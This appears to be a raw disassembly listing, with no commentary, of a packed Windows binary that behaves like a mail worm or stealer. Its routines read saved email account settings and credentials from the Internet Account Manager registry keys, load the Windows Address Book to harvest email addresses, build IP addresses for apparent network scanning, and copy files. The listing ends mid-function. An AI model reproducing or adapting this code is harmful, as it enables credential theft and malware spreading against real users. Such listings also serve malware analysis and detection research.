mov edi, dword_42408C
push 32h
call edi ; Sleep
mov al, [esi+20h]
mov cl, [esi+21h]
mov dl, [esi+22h]
mov [ebp+var_324], ebx
mov byte ptr [ebp+var_324], al
mov al, [ebp+var_31D]
mov byte ptr [ebp+var_324+1], cl
mov byte ptr [ebp+var_324+2], dl
mov byte ptr [ebp+var_324+3], al
mov ecx, [ebp+var_324]
push ecx
call dword_424258 ; inet_ntoa
mov esi, eax
push esi
call sub_40EDF0
add esp, 4
cmp eax, ebx
jz loc_40A171
jmp short loc_409F50
; ---------------------------------------------------------------------------
align 10h
loc_409F50: ; CODE XREF: sub_409E30+115�j
; sub_409E30+12E�j
push ebx
lea ecx, [ebp+var_348]
call sub_408220
test eax, eax
jnz short loc_409F50
push 0Ah
call edi ; Sleep
lea edx, [ebp+var_348]
push edx
push esi
call sub_4091D0
add esp, 8
cmp eax, ebx
jz loc_40A171
mov edx, [ebp+var_33C]
cmp edx, ebx
jnz short loc_409F8E
mov [ebp+var_32C], ebx
jmp short loc_409FA0
; ---------------------------------------------------------------------------
loc_409F8E: ; CODE XREF: sub_409E30+154�j
xor ecx, ecx
mov eax, edx
loc_409F92: ; CODE XREF: sub_409E30+358�j
cmp eax, ebx
jnz loc_40A184
mov [ebp+var_32C], ecx
loc_409FA0: ; CODE XREF: sub_409E30+15C�j
mov esi, [ebp+var_338]
mov [ebp+var_324], ebx
lea esp, [esp+0]
loc_409FB0: ; CODE XREF: sub_409E30+32C�j
mov eax, [ebp+var_324]
cmp eax, [ebp+var_32C]
jge loc_40A161
mov ecx, [ebp+var_328]
cmp [ecx+18h], ebx
jnz loc_40A161
cmp edx, ebx
mov eax, edx
jz loc_40A156
mov ecx, 1
loc_409FE0: ; CODE XREF: sub_409E30+1C4�j
cmp ecx, [ebp+var_324]
jg short loc_409FF6
cmp eax, esi
jz loc_40A156
mov eax, [eax+4]
inc ecx
jmp short loc_409FE0
; ---------------------------------------------------------------------------
loc_409FF6: ; CODE XREF: sub_409E30+1B6�j
mov [ebp+var_330], eax
mov esi, [eax]
mov ecx, esi
lea edx, [ebp+var_31C]
loc_40A006: ; CODE XREF: sub_409E30+1DE�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_40A006
mov ecx, esi
lea edx, [ebp+var_218]
loc_40A018: ; CODE XREF: sub_409E30+1F0�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_40A018
lea edx, [ebp+var_54]
push edx
call sub_40E760
lea eax, [ebp+var_94]
add esp, 4
push eax
call sub_40EB20
lea ecx, [ebp+var_114]
add esp, 4
push ecx
call sub_40E8B0
lea edx, [ebp+var_D4]
add esp, 4
push edx
call sub_40EAE0
lea eax, [ebp+var_54]
add esp, 4
mov edx, eax
loc_40A060: ; CODE XREF: sub_409E30+235�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40A060
lea edi, [ebp+var_31C]
sub eax, edx
dec edi
loc_40A070: ; CODE XREF: sub_409E30+246�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40A070
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_114]
rep movsb
mov ecx, eax
loc_40A090: ; CODE XREF: sub_409E30+265�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40A090
lea edi, [ebp+var_218]
sub eax, ecx
mov esi, ecx
dec edi
loc_40A0A2: ; CODE XREF: sub_409E30+278�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40A0A2
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_94]
rep movsb
mov ecx, eax
loc_40A0C0: ; CODE XREF: sub_409E30+295�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40A0C0
lea edi, [ebp+var_31C]
sub eax, ecx
mov esi, ecx
dec edi
loc_40A0D2: ; CODE XREF: sub_409E30+2A8�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40A0D2
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_D4]
rep movsb
mov ecx, eax
loc_40A0F0: ; CODE XREF: sub_409E30+2C5�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40A0F0
lea edi, [ebp+var_218]
sub eax, ecx
mov esi, ecx
dec edi
loc_40A102: ; CODE XREF: sub_409E30+2D8�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40A102
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+var_328]
mov ecx, [esi+24h]
mov edx, [ecx]
push ebx
lea eax, [ebp+var_31C]
push eax
add edx, 108h
push edx
call dword_424110 ; CopyFileA
mov ecx, [esi+24h]
mov ecx, [ecx+4]
lea eax, [ebp+var_218]
push eax
call sub_40B0E0
mov esi, [ebp+var_338]
mov edx, [ebp+var_33C]
loc_40A156: ; CODE XREF: sub_409E30+1A5�j
; sub_409E30+1BA�j
inc [ebp+var_324]
jmp loc_409FB0
; ---------------------------------------------------------------------------
loc_40A161: ; CODE XREF: sub_409E30+18C�j
; sub_409E30+19B�j ...
push ebx
lea ecx, [ebp+var_348]
call sub_408220
test eax, eax
jnz short loc_40A161
loc_40A171: ; CODE XREF: sub_409E30+10F�j
; sub_409E30+146�j
mov al, [ebp+var_31D]
mov esi, [ebp+var_328]
loc_40A17D: ; CODE XREF: sub_409E30+B8�j
inc al
jmp loc_409ECB
; ---------------------------------------------------------------------------
loc_40A184: ; CODE XREF: sub_409E30+164�j
mov eax, [eax+4]
inc ecx
jmp loc_409F92
; ---------------------------------------------------------------------------
loc_40A18D: ; DATA XREF: UPX0:004266F0�o
mov eax, offset loc_40A1A8
retn
; ---------------------------------------------------------------------------
loc_40A193: ; CODE XREF: sub_409E30+A6�j
; sub_409E30+AF�j
cmp [esi+18h], ebx
jnz short loc_40A1B0
push 2BF20h
call dword_42408C ; Sleep
jmp loc_409EC0
; ---------------------------------------------------------------------------
loc_40A1A8: ; DATA XREF: sub_409E30:loc_40A18D�o
xor ebx, ebx
lea ebx, [ebx+0]
loc_40A1B0: ; CODE XREF: sub_409E30+93�j
; sub_409E30+366�j ...
push ebx
lea ecx, [ebp+var_348]
call sub_408220
test eax, eax
jnz short loc_40A1B0
loc_40A1C0: ; CODE XREF: sub_409E30+3B�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_409E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A1E0 proc near ; CODE XREF: sub_40A650+25�p
push esi
mov esi, ecx
lea eax, [esi+6004h]
push eax
mov dword ptr [esi+710Ch], 0
call sub_40D270
add esp, 4
push 9
push offset dword_429244
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+710Ch]
shl ecx, 6
lea edx, [ecx+esi+5004h]
lea ecx, [ecx+0]
loc_40A220: ; CODE XREF: sub_40A1E0+48�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A220
mov edx, [esi+710Ch]
push 8
push offset dword_429250
mov ecx, offset off_42AE60
mov dword ptr [esi+edx*4+7004h], 19h
call sub_406AE0
mov ecx, [esi+710Ch]
shl ecx, 7
lea edx, [ecx+esi+4]
lea esp, [esp+0]
loc_40A260: ; CODE XREF: sub_40A1E0+88�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A260
mov edx, [esi+710Ch]
shl edx, 7
lea eax, [edx+esi+2004h]
push eax
call sub_40D9F0
mov ecx, [esi+710Ch]
add esp, 4
shl ecx, 6
lea eax, [ecx+esi]
lea ecx, [eax+6004h]
lea edx, [eax+4004h]
jmp short loc_40A2A0
; ---------------------------------------------------------------------------
align 10h
loc_40A2A0: ; CODE XREF: sub_40A1E0+BB�j
; sub_40A1E0+C8�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40A2A0
inc dword ptr [esi+710Ch]
mov dword ptr [esi+7104h], 1
mov dword ptr [esi+7108h], 0
pop esi
retn
sub_40A1E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A2D0 proc near ; CODE XREF: sub_40C7C0+68�p
var_3E8 = dword ptr -3E8h
var_3E4 = dword ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = byte ptr -3D0h
var_3C4 = byte ptr -3C4h
var_384 = byte ptr -384h
var_344 = byte ptr -344h
var_304 = byte ptr -304h
var_2C4 = byte ptr -2C4h
var_284 = byte ptr -284h
var_244 = byte ptr -244h
var_204 = byte ptr -204h
var_1C4 = byte ptr -1C4h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_4 = dword ptr -4
sub esp, 3E8h
mov eax, dword_42A290
push ebx
push ebp
push esi
push edi
mov [esp+3F8h+var_3D4], ecx
mov ecx, 0Dh
mov esi, offset aSoftwareMicros ; "Software\\Microsoft\\Internet Account Man"...
lea edi, [esp+3F8h+var_184]
rep movsd
push 0Ch
push offset dword_429258
mov ecx, offset off_42AE60
mov [esp+400h+var_4], eax
movsw
call sub_406AE0
lea edx, [esp+3F8h+var_384]
loc_40A314: ; CODE XREF: sub_40A2D0+4C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A314
push 13h
push offset dword_429264
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+3F8h+var_304]
loc_40A336: ; CODE XREF: sub_40A2D0+6E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A336
push 0Ah
push offset dword_429278
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+3F8h+var_204]
loc_40A358: ; CODE XREF: sub_40A2D0+90�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A358
push 12h
push offset dword_429284
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+3F8h+var_284]
lea ebx, [ebx+0]
loc_40A380: ; CODE XREF: sub_40A2D0+B8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A380
push 0Fh
push offset dword_429298
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+3F8h+var_1C4]
loc_40A3A2: ; CODE XREF: sub_40A2D0+DA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A3A2
mov ebx, 1
mov [esp+3F8h+var_3E0], ebx
loc_40A3B5: ; CODE XREF: sub_40A2D0+35A�j
push ebx
push 5
push offset dword_4292A8
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+400h+var_3D0]
push eax
call dword_4241F4 ; wsprintfA
add esp, 0Ch
xor eax, eax
jmp short loc_40A3E0
; ---------------------------------------------------------------------------
align 10h
loc_40A3E0: ; CODE XREF: sub_40A2D0+108�j
; sub_40A2D0+121�j
mov cl, [esp+eax+3F8h+var_184]
mov [esp+eax+3F8h+var_104], cl
inc eax
test cl, cl
jnz short loc_40A3E0
lea eax, [esp+3F8h+var_3D0]
mov esi, eax
lea esp, [esp+0]
loc_40A400: ; CODE XREF: sub_40A2D0+135�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A400
lea edi, [esp+3F8h+var_104]
sub eax, esi
dec edi
loc_40A411: ; CODE XREF: sub_40A2D0+147�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40A411
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+3F8h+var_3E4]
push ecx
push 20019h
push 0
lea edx, [esp+404h+var_104]
push edx
push 80000001h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz loc_40A622
mov ebp, dword_424014
lea eax, [esp+3F8h+var_3E8]
push eax
mov eax, [esp+3FCh+var_3E4]
lea ecx, [esp+3FCh+var_344]
push ecx
push 0
push 0
lea edx, [esp+408h+var_384]
push edx
mov edi, 40h
push eax
mov [esp+410h+var_3E8], edi
call ebp ; RegQueryValueExA
lea ecx, [esp+3F8h+var_3E8]
push ecx
mov ecx, [esp+3FCh+var_3E4]
lea edx, [esp+3FCh+var_3C4]
push edx
push 0
mov esi, eax
push 0
lea eax, [esp+408h+var_304]
push eax
push ecx
mov [esp+410h+var_3E8], edi
call ebp ; RegQueryValueExA
mov edi, eax
mov eax, 4
mov [esp+3F8h+var_3E8], eax
mov [esp+3F8h+var_3DC], eax
lea edx, [esp+3F8h+var_3E8]
push edx
lea eax, [esp+3FCh+var_3D8]
push eax
mov eax, [esp+400h+var_3E4]
lea ecx, [esp+400h+var_3DC]
push ecx
push 0
lea edx, [esp+408h+var_204]
push edx
push eax
call ebp ; RegQueryValueExA
lea ecx, [esp+3F8h+var_3E8]
push ecx
mov ecx, [esp+3FCh+var_3E4]
lea edx, [esp+3FCh+var_244]
push edx
push 0
mov ebx, eax
push 0
lea eax, [esp+408h+var_284]
push eax
push ecx
mov [esp+410h+var_3E8], 40h
call ebp ; RegQueryValueExA
lea edx, [esp+3F8h+var_3E8]
push edx
mov edx, [esp+3FCh+var_3E4]
mov ebp, eax
lea eax, [esp+3FCh+var_2C4]
push eax
push 0
push 0
lea ecx, [esp+408h+var_1C4]
push ecx
push edx
mov [esp+410h+var_3E8], 40h
call dword_424014 ; RegQueryValueExA
test esi, esi
jnz loc_40A613
test edi, edi
jnz loc_40A613
test eax, eax
jnz loc_40A613
mov esi, [esp+3F8h+var_3D4]
mov eax, [esi+710Ch]
shl eax, 7
lea ecx, [esp+3F8h+var_344]
lea edx, [eax+esi+4]
loc_40A557: ; CODE XREF: sub_40A2D0+28F�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40A557
mov edx, [esi+710Ch]
shl edx, 7
lea ecx, [esp+3F8h+var_3C4]
lea edx, [edx+esi+2004h]
loc_40A575: ; CODE XREF: sub_40A2D0+2AD�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40A575
mov eax, [esi+710Ch]
shl eax, 6
lea ecx, [esp+3F8h+var_2C4]
lea edx, [eax+esi+4004h]
loc_40A596: ; CODE XREF: sub_40A2D0+2CE�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40A596
test ebx, ebx
jnz short loc_40A5B7
mov ecx, [esi+710Ch]
mov edx, [esp+3F8h+var_3D8]
mov [esi+ecx*4+7004h], edx
jmp short loc_40A5C8
; ---------------------------------------------------------------------------
loc_40A5B7: ; CODE XREF: sub_40A2D0+2D2�j
mov eax, [esi+710Ch]
mov dword ptr [esi+eax*4+7004h], 19h
loc_40A5C8: ; CODE XREF: sub_40A2D0+2E5�j
test ebp, ebp
jnz short loc_40A5EF
mov edx, [esi+710Ch]
shl edx, 6
lea ecx, [esp+3F8h+var_244]
lea edx, [edx+esi+6004h]
loc_40A5E3: ; CODE XREF: sub_40A2D0+31B�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40A5E3
jmp short loc_40A60D
; ---------------------------------------------------------------------------
loc_40A5EF: ; CODE XREF: sub_40A2D0+2FA�j
mov eax, [esi+710Ch]
shl eax, 6
lea ecx, [esp+3F8h+var_3C4]
lea edx, [eax+esi+6004h]
loc_40A603: ; CODE XREF: sub_40A2D0+33B�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_40A603
loc_40A60D: ; CODE XREF: sub_40A2D0+31D�j
inc dword ptr [esi+710Ch]
loc_40A613: ; CODE XREF: sub_40A2D0+259�j
; sub_40A2D0+261�j ...
mov ecx, [esp+3F8h+var_3E4]
push ecx
call dword_424008 ; RegCloseKey
mov ebx, [esp+3F8h+var_3E0]
loc_40A622: ; CODE XREF: sub_40A2D0+178�j
inc ebx
cmp ebx, 40h
mov [esp+3F8h+var_3E0], ebx
jbe loc_40A3B5
mov ecx, [esp+3F8h+var_4]
pop edi
pop esi
pop ebp
pop ebx
call sub_4192B6
add esp, 3E8h
retn
sub_40A2D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A650 proc near ; CODE XREF: sub_40C480+5B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push 0
mov dword ptr [esi], offset off_4244B0
mov [esi+7110h], eax
call sub_419875
push eax
call sub_419846
add esp, 8
mov ecx, esi
call sub_40A1E0
mov eax, esi
pop esi
retn 4
sub_40A650 endp
; =============== S U B R O U T I N E =======================================
sub_40A680 proc near ; DATA XREF: UPX0:off_4244B0�o
arg_0 = byte ptr 4
test [esp+arg_0], 1
push esi
mov esi, ecx
mov dword ptr [esi], offset off_4244B0
jz short loc_40A699
push esi
call sub_41930D
add esp, 4
loc_40A699: ; CODE XREF: sub_40A680+E�j
mov eax, esi
pop esi
retn 4
sub_40A680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A6A0 proc near ; CODE XREF: sub_40AA90+5A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
mov esi, ecx
lea ecx, [ebp+ebp*2+0]
xor ebx, ebx
shl ecx, 8
push ecx
mov dword ptr [esi], offset off_42450C
mov [esi+128h], eax
mov [esi+124h], ebx
mov [esi+118h], ebx
mov [esi+11Ch], ebx
call sub_4191BC
add esp, 4
lea edx, [esp+0Ch+arg_4]
push edx
push 0F003Fh
push ebx
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\WAB\\DLLPath"
push 80000002h
mov [esi+120h], eax
mov [esp+20h+arg_0], 320h
call dword_424010 ; RegOpenKeyExA
test eax, eax
jnz loc_40A7B1
mov ecx, [esp+0Ch+arg_4]
push edi
lea eax, [esp+10h+arg_0]
push eax
lea edi, [esi+4]
push edi
push ebx
push ebx
push offset byte_4243C3
push ecx
call dword_424014 ; RegQueryValueExA
test eax, eax
jnz short loc_40A7A8
mov edx, [esp+10h+arg_4]
push edx
call dword_424008 ; RegCloseKey
push edi
call dword_424104 ; LoadLibraryA
cmp eax, ebx
mov [esi+108h], eax
jz short loc_40A7A8
push 8
push offset dword_4293D4
mov ecx, offset off_42AE60
call sub_406AE0
push eax
mov eax, [esi+108h]
push eax
call dword_424100 ; GetProcAddress
cmp eax, ebx
mov [esi+114h], eax
jz short loc_40A7A8
push ebx
push ebx
lea ecx, [esi+110h]
push ecx
lea edx, [esi+10Ch]
push edx
call eax
test eax, eax
mov eax, esi
jnz short loc_40A7A1
mov [esi+118h], ebp
mov [esi+11Ch], ebx
mov dword ptr [esi+124h], 1
loc_40A7A1: ; CODE XREF: sub_40A6A0+E9�j
pop edi
pop esi
pop ebp
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_40A7A8: ; CODE XREF: sub_40A6A0+8C�j
; sub_40A6A0+A8�j ...
pop edi
mov eax, esi
pop esi
pop ebp
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_40A7B1: ; CODE XREF: sub_40A6A0+68�j
mov eax, esi
pop esi
pop ebp
pop ebx
retn 8
sub_40A6A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A7C0 proc near ; CODE XREF: sub_40AB90+A�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 30h
push ebx
mov ebx, ecx
cmp dword ptr [ebx+124h], 1
jnz loc_40AA3B
mov eax, [ebx+114h]
push esi
xor esi, esi
cmp eax, esi
jz loc_40AA3A
mov eax, [ebx+10Ch]
mov ecx, [eax]
lea edx, [esp+38h+var_10]
push edx
lea edx, [esp+3Ch+var_C]
push edx
push eax
call dword ptr [ecx+64h]
test eax, eax
jnz loc_40AA3A
mov eax, [ebx+10Ch]
lea edx, [esp+38h+var_1C]
push edx
lea edx, [esp+3Ch+var_20]
push edx
mov edx, [esp+40h+var_10]
push 10h
push esi
push edx
mov edx, [esp+4Ch+var_C]
push edx
mov [esp+50h+var_20], esi
mov [esp+50h+var_1C], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+38h]
test eax, eax
jnz loc_40AA3A
cmp [esp+38h+var_20], 4
push edi
jnz loc_40AA0C
mov eax, [esp+3Ch+var_1C]
lea edx, [esp+3Ch+var_30]
push edx
push esi
mov edi, eax
mov [esp+44h+var_30], esi
mov ecx, [eax]
push eax
mov [esp+48h+var_4], edi
call dword ptr [ecx+38h]
test eax, eax
jnz loc_40AA39
mov eax, [esp+3Ch+var_30]
mov ecx, [eax]
lea edx, [esp+3Ch+var_8]
push edx
push esi
push eax
call dword ptr [ecx+24h]
test eax, eax
jnz loc_40AA39
mov eax, [esp+3Ch+var_30]
mov ecx, [eax]
lea edx, [esp+3Ch+var_24]
push edx
mov edx, [esp+40h+var_8]
push esi
push edx
push eax
call dword ptr [ecx+4Ch]
test eax, eax
jnz loc_40AA39
loc_40A898: ; DATA XREF: UPX0:00428604�o
; UPX0:00428648�o ...
mov eax, [esp+3Ch+var_24]
cmp [eax], esi
mov [esp+3Ch+var_14], esi
jbe loc_40A9EB
mov [esp+3Ch+var_28], esi
push ebp
lea ecx, [ecx+0]
loc_40A8B0: ; CODE XREF: sub_40A7C0+21E�j
mov eax, [ebx+11Ch]
mov edx, [ebx+120h]
mov ecx, [esp+40h+var_28]
lea esi, [eax+eax*2]
shl esi, 8
add esi, edx
lea edi, [esi+200h]
mov byte ptr [esi], 0
mov byte ptr [edi], 0
mov byte ptr [esi+100h], 0
mov eax, [esp+40h+var_24]
lea ebp, [ecx+eax+4]
mov ecx, [ebp+4]
xor eax, eax
cmp ecx, eax
mov [esp+40h+var_18], eax
jbe loc_40A98C
mov [esp+40h+var_2C], eax
jmp short loc_40A900
; ---------------------------------------------------------------------------
align 10h
loc_40A900: ; CODE XREF: sub_40A7C0+138�j
; sub_40A7C0+1C6�j
mov ecx, [esp+40h+var_2C]
mov eax, [ebp+8]
add eax, ecx
mov ecx, [eax]
cmp ecx, 3001001Eh
jz short loc_40A95E
cmp ecx, 3003001Eh
jz short loc_40A93C
cmp ecx, 3A4F001Eh
jnz short loc_40A96D
mov eax, [eax+8]
lea edx, [esi+100h]
lea esp, [esp+0]
loc_40A930: ; CODE XREF: sub_40A7C0+178�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A930
jmp short loc_40A96D
; ---------------------------------------------------------------------------
loc_40A93C: ; CODE XREF: sub_40A7C0+159�j
mov eax, [eax+8]
mov edx, edi
loc_40A941: ; CODE XREF: sub_40A7C0+189�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A941
push 40h
push edi
call sub_41A3F0
add esp, 8
test eax, eax
jnz short loc_40A96D
mov [edi], al
jmp short loc_40A96D
; ---------------------------------------------------------------------------
loc_40A95E: ; CODE XREF: sub_40A7C0+151�j
mov eax, [eax+8]
mov edx, esi
loc_40A963: ; CODE XREF: sub_40A7C0+1AB�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A963
loc_40A96D: ; CODE XREF: sub_40A7C0+161�j
; sub_40A7C0+17A�j ...
mov eax, [esp+40h+var_18]
mov edx, [esp+40h+var_2C]
mov ecx, [ebp+4]
inc eax
add edx, 10h
cmp eax, ecx
mov [esp+40h+var_18], eax
mov [esp+40h+var_2C], edx
jb loc_40A900
loc_40A98C: ; CODE XREF: sub_40A7C0+12E�j
mov eax, edi
lea edx, [eax+1]
loc_40A991: ; CODE XREF: sub_40A7C0+1D6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40A991
sub eax, edx
mov [esp+40h+var_18], eax
jz short loc_40A9B5
mov eax, [ebx+11Ch]
cmp eax, [ebx+118h]
jge short loc_40A9B5
inc eax
mov [ebx+11Ch], eax
loc_40A9B5: ; CODE XREF: sub_40A7C0+1DE�j
; sub_40A7C0+1EC�j
mov eax, [ebx+110h]
mov edx, [eax]
push ebp
push eax
call dword ptr [edx+18h]
mov ecx, [esp+40h+var_14]
mov esi, [esp+40h+var_28]
mov eax, [esp+40h+var_24]
mov edx, [eax]
inc ecx
add esi, 0Ch
cmp ecx, edx
mov [esp+40h+var_14], ecx
mov [esp+40h+var_28], esi
jb loc_40A8B0
mov edi, [esp+40h+var_4]
xor esi, esi
pop ebp
loc_40A9EB: ; CODE XREF: sub_40A7C0+E2�j
mov ecx, [ebx+110h]
mov edx, [ecx]
push eax
push ecx
call dword ptr [edx+18h]
mov eax, [esp+38h+var_2C]
cmp eax, esi
jz short loc_40AA06
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40AA06: ; CODE XREF: sub_40A7C0+23E�j
mov edx, [edi]
push edi
call dword ptr [edx+8]
loc_40AA0C: ; CODE XREF: sub_40A7C0+7B�j
mov eax, [ebx+10Ch]
cmp eax, esi
jz short loc_40AA1C
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40AA1C: ; CODE XREF: sub_40A7C0+254�j
mov eax, [ebx+110h]
cmp eax, esi
jz short loc_40AA2C
mov edx, [eax]
push eax
call dword ptr [edx+8]
loc_40AA2C: ; CODE XREF: sub_40A7C0+264�j
mov eax, [ebx+108h]
push eax
call dword_424118 ; FreeLibrary
loc_40AA39: ; CODE XREF: sub_40A7C0+9D�j
; sub_40A7C0+B5�j ...
pop edi
loc_40AA3A: ; CODE XREF: sub_40A7C0+1E�j
; sub_40A7C0+3C�j ...
pop esi
loc_40AA3B: ; CODE XREF: sub_40A7C0+D�j
pop ebx
add esp, 30h
retn
sub_40A7C0 endp
; =============== S U B R O U T I N E =======================================
sub_40AA40 proc near ; DATA XREF: UPX0:off_42450C�o
arg_0 = byte ptr 4
xor eax, eax
push esi
mov esi, ecx
mov [esi+118h], eax
mov [esi+11Ch], eax
mov [esi+124h], eax
mov eax, [esi+120h]
push eax
mov dword ptr [esi], offset off_42450C
call sub_4198AE
mov al, [esp+8+arg_0]
add esp, 4
test al, 1
jz short loc_40AA7D
push esi
call sub_41930D
add esp, 4
loc_40AA7D: ; CODE XREF: sub_40AA40+32�j
mov eax, esi
pop esi
retn 4
sub_40AA40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AA90 proc near ; CODE XREF: sub_40C480+122�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
push 0FFFFFFFFh
push offset SEH_40AA90
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
push edi
mov [esp+18h+var_10], esi
call sub_418F60
mov edi, [esp+18h+arg_0]
push 12Ch
mov [esp+1Ch+var_4], 0
mov dword ptr [esi], offset off_424510
mov [esi+20h], edi
call sub_4191C1
add esp, 4
mov [esp+18h+arg_0], eax
test eax, eax
mov byte ptr [esp+18h+var_4], 1
jz short loc_40AAF1
push edi
push 186A0h
mov ecx, eax
call sub_40A6A0
jmp short loc_40AAF3
; ---------------------------------------------------------------------------
loc_40AAF1: ; CODE XREF: sub_40AA90+50�j
xor eax, eax
loc_40AAF3: ; CODE XREF: sub_40AA90+5F�j
mov ecx, [esp+18h+var_C]
mov [esi+18h], eax
mov dword ptr [esi+1Ch], 0
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
add esp, 10h
retn 4
sub_40AA90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AB20 proc near ; CODE XREF: UPX0:0040AC33�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_40AB20
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
mov [esp+14h+var_10], esi
mov dword ptr [esi], offset off_424510
mov eax, [esi+8]
push 0
push eax
mov [esp+1Ch+var_4], 0
call dword_424068 ; TerminateThread
mov ecx, [esi+18h]
test ecx, ecx
jz short loc_40AB64
mov edx, [ecx]
push 1
call dword ptr [edx]
loc_40AB64: ; CODE XREF: sub_40AB20+3C�j
mov ecx, esi
mov [esp+14h+var_4], 0FFFFFFFFh
call sub_418F90
mov ecx, [esp+14h+var_C]
pop esi
mov large fs:0, ecx
add esp, 10h
retn
sub_40AB20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AB90 proc near ; CODE XREF: sub_40C7C0+10C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov [ecx+1Ch], eax
mov ecx, [ecx+18h]
call sub_40A7C0
retn 4
sub_40AB90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ABB0 proc near ; DATA XREF: UPX0:00424514�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_40ABB0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_10], esp
xor edi, edi
push 0FFFFFFFEh
mov esi, ecx
